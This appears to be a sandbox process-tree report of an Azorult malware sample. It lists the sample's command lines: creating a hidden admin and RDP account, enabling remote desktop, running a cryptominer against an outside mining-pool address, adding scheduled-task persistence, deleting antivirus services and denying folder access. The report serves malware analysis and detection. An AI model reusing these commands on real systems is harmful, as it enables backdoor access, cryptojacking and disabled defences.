C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4324.3.13996710\1409351736" -childID 1 -isForBrowser -prefsHandle 2232 -prefMapHandle 1832 -prefsLen 122 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4324 "\\.\pipe\gecko-crash-server-pipe.4324" 2276 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4324.13.1459489169\1945926767" -childID 2 -isForBrowser -prefsHandle 3424 -prefMapHandle 3420 -prefsLen 6979 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4324 "\\.\pipe\gecko-crash-server-pipe.4324" 3436 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4324.20.1487890511\912837595" -childID 3 -isForBrowser -prefsHandle 3884 -prefMapHandle 3996 -prefsLen 7684 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4324 "\\.\pipe\gecko-crash-server-pipe.4324" 4028 tab3⤵
-
C:\Program Files\Mozilla Firefox\uninstall\helper.exe"C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /SetAsDefaultAppUser3⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\ImmersiveControlPanel\SystemSettings.exe"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Azorult.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Azorult.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "4⤵
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"5⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"5⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10005⤵
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own5⤵
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"5⤵
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\programdata\microsoft\intel\P.exeC:\programdata\microsoft\intel\P.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "8⤵
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f9⤵
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f9⤵
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow9⤵
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add10⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12519⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o9⤵
- Executes dropped EXE
- Modifies WinLogon
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow10⤵
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w9⤵
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f9⤵
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited10⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"9⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"9⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
C:\ProgramData\Microsoft\Intel\winlog.exeC:\ProgramData\Microsoft\Intel\winlog.exe -p1234⤵
-
C:\ProgramData\Microsoft\Intel\winlogon.exe"C:\ProgramData\Microsoft\Intel\winlogon.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B7D4.tmp\B7E4.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"7⤵
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns5⤵
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns6⤵
- Gathers network information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force5⤵
-
C:\Windows\system32\gpupdate.exegpupdate /force6⤵
-
C:\ProgramData\WindowsTask\audiodg.exeC:\ProgramData\WindowsTask\audiodg.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\WindowsTask\MicrosoftHost.exeC:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://185.139.69.167:3333 -u CPU_INK --donate-level=1 -k -t15⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 14⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat4⤵
- Drops file in Drivers directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat4⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
C:\programdata\install\ink.exeC:\programdata\install\ink.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc2⤵
-
C:\Windows\SysWOW64\sc.exesc start appidsvc3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt2⤵
-
C:\Windows\SysWOW64\sc.exesc start appmgmt3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto2⤵
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto2⤵
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv2⤵
-
C:\Windows\SysWOW64\sc.exesc delete swprv3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice2⤵
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice2⤵
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice2⤵
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice2⤵
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc2⤵
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer2⤵
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer2⤵
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle2⤵
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop AudioServer2⤵
-
C:\Windows\SysWOW64\sc.exesc stop AudioServer3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AudioServer"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete AudioServer"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_642⤵
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_643⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql2⤵
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql2⤵
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls c:\programdata\Malwarebytes /deny System:(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls c:\programdata\Malwarebytes /deny Admin:(F)
        - Modifies file permissions
  [2] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    [3] C:\Windows\System32\Conhost.exe
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    [3] C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
        - Modifies file permissions
